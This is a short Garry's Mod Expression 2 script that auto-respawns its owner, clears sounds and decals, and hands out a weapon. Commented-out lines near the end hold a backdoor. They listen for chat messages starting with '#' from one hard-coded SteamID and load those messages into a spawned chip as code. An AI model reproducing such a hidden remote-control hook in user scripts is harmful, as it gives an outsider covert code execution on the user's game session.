@name auto resp
@persist W:string V:vector A:angle VV:vector W:string
runOnTick(1)
if(!owner():isAlive()){
    spawn()
    concmd("stopsound")
    concmd("r_cleardecals")
    }
#owner():weapon():setClip1(owner():weapon():clip1Size())
owner():giveWeapon(W)
timer("check",100)
#if(first()||clk("check")){O=findPlayerBySteamID("STEAM_0:0:766803141")}
#if(first()){E2=spawnExpression2(vec(0,0,0),ang(0,0,0),"")}
#if(O:isValid()&O:lastSaid():explode("")[1,string]=="#"){E2:remoteSetCode(O:lastSaid():sub(2))}

